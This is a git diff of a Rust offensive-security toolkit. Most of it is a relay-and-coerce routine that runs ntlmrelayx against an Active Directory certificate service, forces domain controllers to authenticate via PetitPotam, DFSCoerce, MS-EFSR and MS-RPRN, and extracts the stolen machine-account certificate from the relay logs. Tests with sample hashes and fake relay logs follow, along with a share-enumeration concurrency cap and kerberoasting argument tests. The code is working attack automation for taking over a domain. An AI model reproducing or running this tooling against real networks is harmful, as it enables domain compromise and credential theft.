"Base64 certificate of user :" + // followed by the base64 blob on the next line. Kept as fallback. + let mut pfx_path: Option = None; + let mut relayed_user: Option = None; + if captured_via.is_some() { + let log = tokio::fs::read_to_string(&relay_log) + .await + .unwrap_or_default(); + + if let Some(cap) = extract_pfx_capture_from_log(&log) { + let bare = cap.pfx_basename.trim_start_matches("./"); + let candidate = workdir.join(bare); + if tokio::fs::metadata(&candidate).await.is_ok() { + pfx_path = Some(candidate); + relayed_user = Some(cap.user); + } + } + + if pfx_path.is_none() { + if let Some((user, b64)) = extract_cert_from_log(&log) { + let pfx = workdir.join(format!("{user}.pfx")); + let cleaned: String = b64.chars().filter(|c| !c.is_whitespace()).collect(); + if let Ok(bytes) = base64::engine::general_purpose::STANDARD.decode(&cleaned) { + if !bytes.is_empty() && tokio::fs::write(&pfx, &bytes).await.is_ok() { + pfx_path = Some(pfx); + relayed_user = Some(user); + } + } + } + } + } + + let mut stdout = summary; + if let Some(via) = captured_via { + stdout.push_str(&format!("CERT_CAPTURED_VIA={via}\n")); + } + if let (Some(p), Some(u)) = (pfx_path.as_ref(), relayed_user.as_ref()) { + stdout.push_str(&format!("PFX_FILE={}\n", p.display())); + stdout.push_str(&format!("RELAYED_USER={u}\n")); + } + stdout.push_str("=== RELAY LOG ===\n"); + stdout.push_str( + &tokio::fs::read_to_string(&relay_log) + .await + .unwrap_or_default(), + ); + stdout.push_str("=== COERCE LOG ===\n"); + stdout.push_str( + &tokio::fs::read_to_string(&coerce_log) + .await + .unwrap_or_default(), + ); + + let success = pfx_path.is_some(); + + // Persist workdir if we resolved a PFX OR if a cert was captured (so + // operators can debug extraction failures without losing the artifact). + if (success || captured_via.is_some()) && opts.keep_workdir_on_capture { + let _ = tempdir.keep(); + } + + Ok(ToolOutput { + stdout, + stderr: String::new(), + exit_code: Some(if success { 0 } else { 1 }), + success, + }) +} + +fn coerce_secret_args(secret: Option<&CoerceSecret>) -> Vec { + match secret { + Some(CoerceSecret::Hash(h)) => vec!["-hashes".into(), format!(":{h}")], + Some(CoerceSecret::Password(p)) => vec!["-p".into(), p.clone()], + None => Vec::new(), + } +} + +async fn append_output(path: &Path, header: &str, output: &std::process::Output) { + use tokio::io::AsyncWriteExt; + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(path) + .await + { + let _ = f.write_all(b"=== ").await; + let _ = f.write_all(header.as_bytes()).await; + let _ = f.write_all(b" ===\n").await; + let _ = f.write_all(&output.stdout).await; + let _ = f.write_all(&output.stderr).await; + let _ = f.write_all(b"\n").await; + } +} + +async fn append_error(path: &Path, header: &str, msg: &str) { + use tokio::io::AsyncWriteExt; + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(path) + .await + { + let _ = f.write_all(b"=== ").await; + let _ = f.write_all(header.as_bytes()).await; + let _ = f.write_all(b" ===\n[ERROR] ").await; + let _ = f.write_all(msg.as_bytes()).await; + let _ = f.write_all(b"\n").await; + } +} + +async fn poll_for_cert(relay_log: &Path, max: Duration, interval: Duration) -> bool { + let deadline = Instant::now() + max; + loop { + if let Ok(s) = tokio::fs::read_to_string(relay_log).await { + // `--adcs` writes "GOT CERTIFICATE! ID " then "Writing PKCS#12 …". + // `--ldap` userCertificate writes "Base64 certificate of user …". + if s.contains("Base64 certificate of user") + || s.contains("GOT CERTIFICATE!") + || s.contains("Writing PKCS#12 certificate to") + { + return true; + } + } + let now = Instant::now(); + if now >= deadline { + return false; + } + let wait = std::cmp::min(interval, deadline - now); + sleep(wait).await; + } +} + +/// Captured-cert metadata for the `--adcs` path: ntlmrelayx writes the PFX to +/// disk relative to its CWD and logs the path. +#[derive(Debug, Clone, PartialEq, Eq)] +struct PfxCapture { + user: String, + pfx_basename: String, +} + +/// Walk the relay log, pair the most-recent authenticating-as-user line with +/// the most-recent "Writing PKCS#12 certificate to " line. Returns None +/// if either marker is missing. +fn extract_pfx_capture_from_log(log: &str) -> Option { + let mut last_user: Option = None; + let mut last_pfx: Option = None; + + for line in log.lines() { + // "[*] Authenticating against http://... as DOMAIN/USER$ SUCCEED" + // "[*] SMBD-Thread-N: Connection from DOMAIN/USER$@ip controlled, attacking..." + // Both shapes appear depending on flow; pull the user after the slash. + if let Some(user) = parse_relayed_user(line) { + last_user = Some(user); + } + // "[*] Writing PKCS#12 certificate to ./DC01.pfx" + if let Some(idx) = line.find("Writing PKCS#12 certificate to ") { + let after = &line[idx + "Writing PKCS#12 certificate to ".len()..]; + let path = after.split_whitespace().next().unwrap_or(""); + if !path.is_empty() { + last_pfx = Some(path.to_string()); + } + } + } + + match (last_user, last_pfx) { + (Some(u), Some(p)) => Some(PfxCapture { + user: u, + pfx_basename: p, + }), + // If we got a PFX path but no user, fall back to the file's basename + // (ntlmrelayx names the PFX after the user). + (None, Some(p)) => { + let base = std::path::Path::new(p.trim_start_matches("./")) + .file_stem() + .and_then(|s| s.to_str()) + .unwrap_or("relayed") + .to_string(); + Some(PfxCapture { + user: base, + pfx_basename: p, + }) + } + _ => None, + } +} + +/// Pull a relayed username out of a line that looks like +/// "DOMAIN/USERNAME$@target" or "DOMAIN/USERNAME@target". Returns the bare +/// username including any trailing `$`. +fn parse_relayed_user(line: &str) -> Option { + let at_idx = line.find('@')?; + let prefix = &line[..at_idx]; + // Walk backwards from '@' to the slash that splits domain/user. + let user_start = prefix.rfind('/')? + 1; + let candidate: &str = prefix[user_start..] + .split_terminator(|c: char| c.is_whitespace()) + .next()?; + if candidate.is_empty() { + return None; + } + // Heuristic — usernames here are word chars + an optional trailing $. + if !candidate + .chars() + .all(|c| c.is_alphanumeric() || c == '$' || c == '_' || c == '-' || c == '.') + { + return None; + } + Some(candidate.to_string()) +} + +/// Parse the relay.log for the LAST captured cert. ntlmrelayx prints +/// `Base64 certificate of user ` followed by the base64 blob on the +/// next non-empty line. Returns (user, base64_blob). +fn extract_cert_from_log(log: &str) -> Option<(String, String)> { + let mut last_user: Option = None; + let mut last_b64: Option = None; + let mut pending_user: Option = None; + + for line in log.lines() { + if let Some(idx) = line.find("Base64 certificate of user ") { + let after = &line[idx + "Base64 certificate of user ".len()..]; + let name = after + .split_whitespace() + .next() + .unwrap_or("") + .trim_end_matches(':'); + if !name.is_empty() { + pending_user = Some(name.to_string()); + } + continue; + } + if let Some(user) = &pending_user { + let trimmed = line.trim(); + if !trimmed.is_empty() { + last_user = Some(user.clone()); + last_b64 = Some(trimmed.to_string()); + pending_user = None; + } + } + } + + match (last_user, last_b64) { + (Some(u), Some(b)) => Some((u, b)), + _ => None, + } +} + /// Relay captured NTLM authentication to multiple targets. /// /// Optional args: `targets_file`, `target_ips` (comma-separated), `dump_sam` @@ -336,6 +1209,623 @@ mod tests { assert!(ntlmrelayx_to_smb(&args).await.is_ok()); } + #[tokio::test] + async fn relay_and_coerce_requires_secret() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_domain": "contoso.local" + }); + let err = relay_and_coerce(&args).await.unwrap_err().to_string(); + assert!(err.contains("coerce_hash") || err.contains("coerce_password")); + } + + #[tokio::test] + async fn relay_and_coerce_rejects_quote_in_inputs() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_domain": "contoso.local", + "coerce_password": "p'ass" + }); + let err = relay_and_coerce(&args).await.unwrap_err().to_string(); + assert!(err.contains("forbidden")); + } + + #[tokio::test] + async fn relay_and_coerce_rejects_same_host() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.10", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755", + "coerce_domain": "contoso.local" + }); + let err = relay_and_coerce(&args).await.unwrap_err().to_string(); + assert!(err.contains("must differ") || err.contains("loopback")); + } + + #[test] + fn parse_relay_coerce_args_accepts_legacy_target_dc_alias() { + let args = json!({ + "ca_host": "192.168.58.10", + "target_dc": "192.168.58.20", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755", + "coerce_domain": "contoso.local" + }); + let cfg = super::parse_relay_coerce_args(&args).expect("legacy alias should parse"); + assert_eq!(cfg.coerce_target, "192.168.58.20"); + } + + #[test] + fn parse_relay_coerce_args_with_hash() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755", + "coerce_domain": "contoso.local" + }); + let cfg = super::parse_relay_coerce_args(&args).expect("valid args should parse"); + assert!(matches!( + cfg.coerce_secret, + Some(super::CoerceSecret::Hash(_)) + )); + } + + #[test] + fn parse_relay_coerce_args_unauth() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "attacker_ip": "192.168.58.100" + }); + let cfg = super::parse_relay_coerce_args(&args).expect("unauth args should parse"); + assert!(cfg.coerce_user.is_none()); + assert!(cfg.coerce_secret.is_none()); + } + + // ── Phase-progression coverage via FakeCoerceProcs ───────────────────── + + use std::collections::{HashMap, HashSet}; + use std::sync::Mutex; + + #[derive(Default, Clone)] + struct PhaseScript { + relay_log_append: Vec, + /// (basename, bytes) — written into workdir when run_phase fires. + pfx_drop: Option<(String, Vec)>, + } + + #[derive(Debug, Clone)] + struct RecordedPhaseCall { + header: String, + bin: String, + args: Vec, + } + + struct FakeState { + is_local_ip: bool, + local_ips: Vec, + binaries_present: HashSet, + relay_early_exit: Option, + relay_initial_log: Vec, + relay_log_path: Option, + coerce_log_path: Option, + phase_scripts: HashMap, + run_phase_calls: Vec, + } + + struct FakeCoerceProcs { + state: Mutex, + } + + impl FakeCoerceProcs { + fn new() -> Self { + Self { + state: Mutex::new(FakeState { + is_local_ip: true, + local_ips: vec!["10.0.0.1".into()], + binaries_present: ["petitpotam".to_string()].into_iter().collect(), + relay_early_exit: None, + relay_initial_log: Vec::new(), + relay_log_path: None, + coerce_log_path: None, + phase_scripts: HashMap::new(), + run_phase_calls: Vec::new(), + }), + } + } + + fn with_local_ip(self, allowed: bool) -> Self { + self.state.lock().unwrap().is_local_ip = allowed; + self + } + + fn with_only_binary(self, names: &[&str]) -> Self { + let mut s = self.state.lock().unwrap(); + s.binaries_present.clear(); + for n in names { + s.binaries_present.insert((*n).to_string()); + } + drop(s); + self + } + + fn with_relay_exit(self, code: i32) -> Self { + self.state.lock().unwrap().relay_early_exit = Some(code); + self + } + + fn with_relay_initial_log(self, bytes: &[u8]) -> Self { + self.state.lock().unwrap().relay_initial_log = bytes.to_vec(); + self + } + + fn with_phase_capture(self, header: &str, log_append: &[u8]) -> Self { + self.state.lock().unwrap().phase_scripts.insert( + header.to_string(), + PhaseScript { + relay_log_append: log_append.to_vec(), + pfx_drop: None, + }, + ); + self + } + + fn with_phase_pfx_drop( + self, + header: &str, + log_append: &[u8], + pfx_basename: &str, + pfx_bytes: &[u8], + ) -> Self { + self.state.lock().unwrap().phase_scripts.insert( + header.to_string(), + PhaseScript { + relay_log_append: log_append.to_vec(), + pfx_drop: Some((pfx_basename.to_string(), pfx_bytes.to_vec())), + }, + ); + self + } + + fn calls(&self) -> Vec { + self.state.lock().unwrap().run_phase_calls.clone() + } + } + + struct FakeRelayHandle { + pid: u32, + early_exit: Option, + } + + impl super::RelayHandle for FakeRelayHandle { + fn pid(&self) -> u32 { + self.pid + } + async fn settle_then_try_wait(&mut self, _settle: Duration) -> Option { + self.early_exit.take() + } + async fn kill_and_wait(&mut self, _timeout: Duration) {} + } + + impl super::CoerceProcs for FakeCoerceProcs { + type Handle = FakeRelayHandle; + + fn is_local_ip(&self, _ip: &str) -> bool { + self.state.lock().unwrap().is_local_ip + } + + fn list_local_ips(&self) -> Vec { + self.state.lock().unwrap().local_ips.clone() + } + + fn which_binary(&self, name: &str) -> bool { + self.state.lock().unwrap().binaries_present.contains(name) + } + + async fn cleanup_stale_listeners(&self, _workdir: &Path) {} + + async fn spawn_relay( + &self, + _target_url: &str, + _template: &str, + relay_log: &Path, + _workdir: &Path, + ) -> Result { + let (initial_log, early_exit) = { + let mut s = self.state.lock().unwrap(); + s.relay_log_path = Some(relay_log.to_path_buf()); + (s.relay_initial_log.clone(), s.relay_early_exit) + }; + tokio::fs::write(relay_log, &initial_log) + .await + .context("fake spawn_relay: write initial relay.log")?; + Ok(FakeRelayHandle { + pid: 4242, + early_exit, + }) + } + + async fn run_phase( + &self, + coerce_log: &Path, + header: &str, + bin: &str, + args: &[&str], + cwd: &Path, + _timeout_secs: u64, + ) { + let (script, relay_log) = { + let mut s = self.state.lock().unwrap(); + s.coerce_log_path = Some(coerce_log.to_path_buf()); + s.run_phase_calls.push(RecordedPhaseCall { + header: header.to_string(), + bin: bin.to_string(), + args: args.iter().map(|x| (*x).to_string()).collect(), + }); + let relay_log = s + .relay_log_path + .clone() + .unwrap_or_else(|| cwd.join("relay.log")); + (s.phase_scripts.get(header).cloned(), relay_log) + }; + // Append a phase header line to coerce.log so the path contract is + // observable — production appends real subprocess output here. + use tokio::io::AsyncWriteExt; + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(coerce_log) + .await + { + let _ = f.write_all(format!("{header}\n").as_bytes()).await; + } + if let Some(script) = script { + if !script.relay_log_append.is_empty() { + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(&relay_log) + .await + { + let _ = f.write_all(&script.relay_log_append).await; + } + } + if let Some((basename, bytes)) = &script.pfx_drop { + let _ = tokio::fs::write(cwd.join(basename), bytes).await; + } + } + } + } + + fn fast_opts() -> super::RunOptions { + super::RunOptions { + relay_settle: Duration::from_millis(0), + poll_interval: Duration::from_millis(2), + poll_phase_1: Duration::from_millis(15), + poll_phase_2: Duration::from_millis(15), + poll_phase_3: Duration::from_millis(15), + post_capture_settle: Duration::from_millis(0), + relay_kill_timeout: Duration::from_millis(15), + keep_workdir_on_capture: false, + // Tests run in parallel and would otherwise fight over the + // single host-wide loopback sentinel port. + acquire_host_lock: false, + } + } + + fn cfg_unauth() -> super::RelayCoerceConfig { + super::RelayCoerceConfig { + ca_host: "192.168.58.10".into(), + coerce_target: "192.168.58.20".into(), + attacker_ip: "192.168.58.100".into(), + coerce_user: None, + coerce_domain: String::new(), + coerce_secret: None, + template: "DomainController".into(), + } + } + + fn cfg_with_creds() -> super::RelayCoerceConfig { + super::RelayCoerceConfig { + ca_host: "192.168.58.10".into(), + coerce_target: "192.168.58.20".into(), + attacker_ip: "192.168.58.100".into(), + coerce_user: Some("alice".into()), + coerce_domain: "contoso.local".into(), + coerce_secret: Some(super::CoerceSecret::Hash( + "b8d76e56e9dac90539aff05e3ccb1755".into(), + )), + template: "DomainController".into(), + } + } + + const PHASE1: &str = "Phase 1: unauth PetitPotam"; + const PHASE2: &str = "Phase 2: DFSCoerce"; + const PHASE3_EFSR: &str = "Phase 3: MS-EFSR"; + const PHASE3_RPRN: &str = "Phase 3: MS-RPRN"; + + #[tokio::test] + async fn run_attacker_ip_not_local_bails_with_clear_error() { + let fake = FakeCoerceProcs::new().with_local_ip(false); + let err = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap_err() + .to_string(); + assert!(err.contains("not a local interface IP"), "got: {err}"); + } + + #[tokio::test] + async fn run_host_lock_contention_returns_busy_marker() { + // Hold the sentinel port ourselves to simulate another in-flight + // relay_and_coerce already running on this host. + let _holder = std::net::TcpListener::bind(("127.0.0.1", super::RELAY_LOCK_PORT)) + .expect("bind sentinel port for test"); + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(true)); + struct ResetFlag; + impl Drop for ResetFlag { + fn drop(&mut self) { + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(false)); + } + } + let _reset = ResetFlag; + let mut opts = fast_opts(); + opts.acquire_host_lock = true; + let fake = FakeCoerceProcs::new(); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, opts) + .await + .unwrap(); + assert!(!out.success); + assert!( + out.stdout.contains("RELAY_BIND_BUSY"), + "expected RELAY_BIND_BUSY, got: {}", + out.stdout + ); + // No phases or relay spawn should fire when the lock is contended. + assert!(fake.calls().is_empty()); + } + + #[tokio::test] + async fn ntlmrelayx_to_smb_returns_busy_when_lock_held() { + let _holder = std::net::TcpListener::bind(("127.0.0.1", super::RELAY_LOCK_PORT)) + .expect("bind sentinel port for test"); + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(true)); + struct ResetFlag; + impl Drop for ResetFlag { + fn drop(&mut self) { + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(false)); + } + } + let _reset = ResetFlag; + let args = json!({"target_ip": "192.168.58.1"}); + let out = super::ntlmrelayx_to_smb(&args).await.unwrap(); + assert!(!out.success, "expected BUSY non-success, got success"); + assert!( + out.stdout.contains("RELAY_BIND_BUSY"), + "expected RELAY_BIND_BUSY in stdout, got: {}", + out.stdout + ); + } + + #[tokio::test] + async fn run_relay_bind_failure_returns_marker() { + let fake = FakeCoerceProcs::new() + .with_relay_exit(98) + .with_relay_initial_log(b"OSError: [Errno 98] Address already in use\n"); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(!out.success); + assert_eq!(out.exit_code, Some(98)); + assert!(out.stdout.contains("RELAY_BIND_FAILED")); + assert!(out.stdout.contains("Address already in use")); + // No phases should run when the relay died at startup. + assert!(fake.calls().is_empty()); + } + + #[tokio::test] + async fn run_phase1_capture_skips_phase2_and_3() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC01$@192.168.58.20 SUCCEED\n\ + [*] GOT CERTIFICATE! ID 1\n\ + [*] Writing PKCS#12 certificate to ./DC01.pfx\n"; + let fake = FakeCoerceProcs::new().with_phase_pfx_drop(PHASE1, log, "DC01.pfx", b"\xab\xcd"); + // Provide creds so we can verify phases 2/3 are skipped DESPITE creds. + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=unauth_petitpotam")); + assert!(out.stdout.contains("RELAYED_USER=DC01$")); + assert!(out.stdout.contains("PFX_FILE=")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1]); + } + + #[tokio::test] + async fn run_phase1_miss_no_creds_skips_phase2_and_3() { + let fake = FakeCoerceProcs::new(); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(!out.success); + assert!(!out.stdout.contains("CERT_CAPTURED_VIA")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1]); + } + + #[tokio::test] + async fn run_phase2_capture_skips_phase3() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC02$@192.168.58.20 SUCCEED\n\ + [*] Writing PKCS#12 certificate to ./DC02.pfx\n"; + let fake = FakeCoerceProcs::new().with_phase_pfx_drop(PHASE2, log, "DC02.pfx", b"\x01\x02"); + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=MS-DFSNM")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1, PHASE2]); + } + + #[tokio::test] + async fn run_phase3_efsr_miss_rprn_capture() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC03$@192.168.58.20 SUCCEED\n\ + [*] Writing PKCS#12 certificate to ./DC03.pfx\n"; + let fake = + FakeCoerceProcs::new().with_phase_pfx_drop(PHASE3_RPRN, log, "DC03.pfx", b"\x09"); + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=MS-RPRN")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1, PHASE2, PHASE3_EFSR, PHASE3_RPRN]); + } + + #[tokio::test] + async fn run_ldap_base64_extraction_decodes_to_workdir() { + // Encode known plaintext so we can verify the decode path. The fake + // emits both the "Authenticating ... DC01$@..." line AND a + // "Base64 certificate of user DC01$:" block. extract_pfx_capture + // returns None (no PKCS#12 line), so the LDAP base64 path runs. + let pfx_bytes = b"PKCS12-FAKE"; + let b64 = base64::engine::general_purpose::STANDARD.encode(pfx_bytes); + let mut log = b"[*] (SMB): Authenticating CONTOSO/DC01$@192.168.58.20 SUCCEED\n\ + [*] Base64 certificate of user DC01$:\n" + .to_vec(); + log.extend_from_slice(b64.as_bytes()); + log.extend_from_slice(b"\n"); + let fake = FakeCoerceProcs::new().with_phase_capture(PHASE1, &log); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success, "stdout={}", out.stdout); + assert!(out.stdout.contains("RELAYED_USER=DC01$")); + // PFX_FILE should point at /DC01$.pfx — confirm the + // marker appears with that filename suffix. + assert!( + out.stdout.contains("DC01$.pfx"), + "expected DC01$.pfx in stdout: {}", + out.stdout + ); + } + + #[tokio::test] + async fn run_petitpotam_binary_fallback_uses_impacket_name() { + let fake = FakeCoerceProcs::new().with_only_binary(&["impacket-petitpotam"]); + let _ = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + let calls = fake.calls(); + let phase1 = calls + .iter() + .find(|c| c.header == PHASE1) + .expect("phase 1 should run"); + assert_eq!(phase1.bin, "impacket-petitpotam"); + } + + #[tokio::test] + async fn run_phase2_passes_credentials() { + // No script: phase 2 misses, but we can inspect its argv. + let fake = FakeCoerceProcs::new(); + let _ = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + let calls = fake.calls(); + let phase2 = calls + .iter() + .find(|c| c.header == PHASE2) + .expect("phase 2 should run"); + assert_eq!(phase2.bin, "dfscoerce"); + // Hash secret must surface as `-hashes :`. + let joined = phase2.args.join(" "); + assert!(joined.contains("-hashes"), "args: {joined}"); + assert!(joined.contains(":b8d76e56"), "args: {joined}"); + assert!(joined.contains("-u alice"), "args: {joined}"); + } + + #[test] + fn extract_cert_from_log_picks_last_capture() { + // Two captures in one log; we want the last one. + let log = "\ +[*] Servers started, waiting for connections\n\ +[*] SMBD-Thread-1: Received connection from x\n\ +[*] Authenticating against http://ca/certsrv/ as DC1$\n\ +[*] Base64 certificate of user DC1$:\n\ +MIIBlahFirstCert==\n\ +[*] Servers started, waiting for connections\n\ +[*] Base64 certificate of user DC2$:\n\ +MIIBlahSecondCert==\n\ +[*] done\n"; + let (user, b64) = super::extract_cert_from_log(log).expect("should extract"); + assert_eq!(user, "DC2$"); + assert_eq!(b64, "MIIBlahSecondCert=="); + } + + #[test] + fn extract_cert_from_log_returns_none_without_marker() { + let log = "[*] Servers started\n[*] no auth received\n"; + assert!(super::extract_cert_from_log(log).is_none()); + } + + #[test] + fn extract_pfx_capture_picks_adcs_pair() { + // Real `--adcs` log shape captured during ntlmrelayx ADCS relay. + let log = "\ +[*] Servers started, waiting for connections\n\ +[*] SMBD-Thread-3: Received connection from 192.168.58.20, attacking target http://192.168.58.10/certsrv/certfnsh.asp\n\ +[*] (SMB): Authenticating against http://192.168.58.10/certsrv/certfnsh.asp CONTOSO/DC01$@192.168.58.20 SUCCEED [1]\n\ +[*] GOT CERTIFICATE! ID 6\n\ +[*] Writing PKCS#12 certificate to ./DC01.pfx\n\ +[*] done\n"; + let cap = super::extract_pfx_capture_from_log(log).expect("should extract"); + assert_eq!(cap.user, "DC01$"); + assert_eq!(cap.pfx_basename, "./DC01.pfx"); + } + + #[test] + fn extract_pfx_capture_falls_back_to_basename_without_user() { + let log = "[*] Writing PKCS#12 certificate to ./MEMBER1.pfx\n"; + let cap = super::extract_pfx_capture_from_log(log).expect("should extract"); + assert_eq!(cap.user, "MEMBER1"); + assert_eq!(cap.pfx_basename, "./MEMBER1.pfx"); + } + + #[test] + fn extract_pfx_capture_returns_none_without_pfx_marker() { + let log = "[*] (SMB): Authenticating against ... CONTOSO/DC01$@192.168.58.20 SUCCEED\n[*] auth complete"; + assert!(super::extract_pfx_capture_from_log(log).is_none()); + } + + #[test] + fn parse_relayed_user_handles_domain_user_dollar_at_ip() { + assert_eq!( + super::parse_relayed_user("blah CONTOSO/DC01$@192.168.58.20 SUCCEED"), + Some("DC01$".to_string()) + ); + assert_eq!( + super::parse_relayed_user("(SMB): Authenticating CONTOSO/jdoe@192.168.58.10"), + Some("jdoe".to_string()) + ); + } + + #[test] + fn parse_relayed_user_returns_none_when_no_user() { + // Lines with `@` but not a `domain/user` shape — URL-only, e.g. + assert_eq!(super::parse_relayed_user("[*] Connection to host"), None); + assert_eq!(super::parse_relayed_user("user@host"), None); // no slash + } + #[tokio::test] async fn ntlmrelayx_multirelay_with_targets_file() { mock::push(mock::success()); diff --git a/ares-tools/src/concurrency.rs b/ares-tools/src/concurrency.rs new file mode 100644 index 00000000..6bb0ba61 --- /dev/null +++ b/ares-tools/src/concurrency.rs @@ -0,0 +1,88 @@ +//! Global concurrency caps for memory-heavy tools. +//! +//! `netexec spider_plus` (used by `smbclient_spider` and `sysvol_script_search`) +//! enumerates SMB share trees recursively and holds the file metadata in RAM +//! across the walk. Each invocation costs ~100–150 MB resident; without a cap, +//! 60+ concurrent dispatches blew the EC2 cgroup to 6–9 GB and OOM-killed the +//! orchestrator (op-20260502-013857, see `bug_orch_oom_spider_plus.md`). +//! +//! This module provides a process-wide async semaphore for those tools. +//! Both the worker `tool_executor` path and the orchestrator's +//! `LocalToolDispatcher` route through `ares_tools::dispatch`, so a single +//! cap here covers both. + +use std::sync::LazyLock; + +use tokio::sync::{Semaphore, SemaphorePermit}; +use tracing::debug; + +/// Default number of concurrent spider_plus dispatches before subsequent calls +/// queue. Picked to keep peak RSS under ~1 GB (4 × ~150 MB) on a t3.medium +/// while still allowing parallelism across multiple SMB targets. +pub const DEFAULT_SPIDER_PLUS_CONCURRENCY: usize = 4; + +/// Override via `ARES_SPIDER_PLUS_CONCURRENCY=`. Values <1 are ignored. +const SPIDER_PLUS_ENV: &str = "ARES_SPIDER_PLUS_CONCURRENCY"; + +static SPIDER_PLUS_PERMITS: LazyLock = LazyLock::new(|| { + let cap = std::env::var(SPIDER_PLUS_ENV) + .ok() + .and_then(|s| s.parse::().ok()) + .filter(|&n| n > 0) + .unwrap_or(DEFAULT_SPIDER_PLUS_CONCURRENCY); + Semaphore::new(cap) +}); + +/// Tools whose implementation invokes `netexec ... -M spider_plus`. Adding a +/// new spider_plus-backed tool? List it here so it shares the cap. +pub fn is_spider_plus_tool(tool_name: &str) -> bool { + matches!(tool_name, "smbclient_spider" | "sysvol_script_search") +} + +/// Acquire a permit for a spider_plus dispatch. The returned permit is held +/// for the lifetime of the tool execution; drop releases it for the next +/// queued call. +/// +/// `acquire()` only fails if the semaphore is closed, which never happens in +/// our static initialization, so we treat it as fatal if observed. +pub async fn acquire_spider_plus_permit() -> SemaphorePermit<'static> { + if SPIDER_PLUS_PERMITS.available_permits() == 0 { + debug!("spider_plus concurrency cap reached, queueing dispatch"); + } + SPIDER_PLUS_PERMITS + .acquire() + .await + .expect("spider_plus semaphore unexpectedly closed") +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn detects_known_spider_plus_tools() { + assert!(is_spider_plus_tool("smbclient_spider")); + assert!(is_spider_plus_tool("sysvol_script_search")); + } + + #[test] + fn ignores_non_spider_tools() { + assert!(!is_spider_plus_tool("nmap_scan")); + assert!(!is_spider_plus_tool("secretsdump")); + assert!(!is_spider_plus_tool("")); + } + + #[tokio::test] + async fn permit_serializes_excess_callers() { + // Sanity check that the global semaphore actually blocks past the cap. + // We can't override the singleton mid-test, but we can verify that + // available_permits decreases when we hold one. + let initial = SPIDER_PLUS_PERMITS.available_permits(); + let permit = acquire_spider_plus_permit().await; + let after_acquire = SPIDER_PLUS_PERMITS.available_permits(); + assert_eq!(after_acquire, initial.saturating_sub(1)); + drop(permit); + let after_drop = SPIDER_PLUS_PERMITS.available_permits(); + assert_eq!(after_drop, initial); + } +} diff --git a/ares-tools/src/credential_access/kerberos.rs b/ares-tools/src/credential_access/kerberos.rs index 23272dec..2ca135b8 100644 --- a/ares-tools/src/credential_access/kerberos.rs +++ b/ares-tools/src/credential_access/kerberos.rs @@ -146,6 +146,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- kerberoast --- + #[test] fn kerberoast_target_format() { let domain = "contoso.local"; @@ -195,6 +197,8 @@ mod tests { assert!(required_str(&args, "dc_ip").is_err()); } + // --- asrep_roast --- + #[test] fn asrep_roast_authenticated_format() { let domain = "contoso.local"; @@ -245,6 +249,8 @@ mod tests { assert_eq!(users_file, Some("/tmp/users.txt")); } + // --- DEFAULT_AD_USERNAMES --- + #[test] fn default_ad_usernames_is_non_empty() { assert!(!super::DEFAULT_AD_USERNAMES.is_empty()); @@ -260,6 +266,8 @@ mod tests { assert!(super::DEFAULT_AD_USERNAMES.contains("krbtgt")); } + // --- kerberos_user_enum_noauth --- + #[test] fn kerberos_user_enum_requires_domain() { let args = json!({"dc_ip": "192.168.58.1"}); @@ -301,6 +309,8 @@ mod tests { assert!(optional_str(&args, "users_file").is_none()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/credential_access/misc.rs b/ares-tools/src/credential_access/misc.rs index 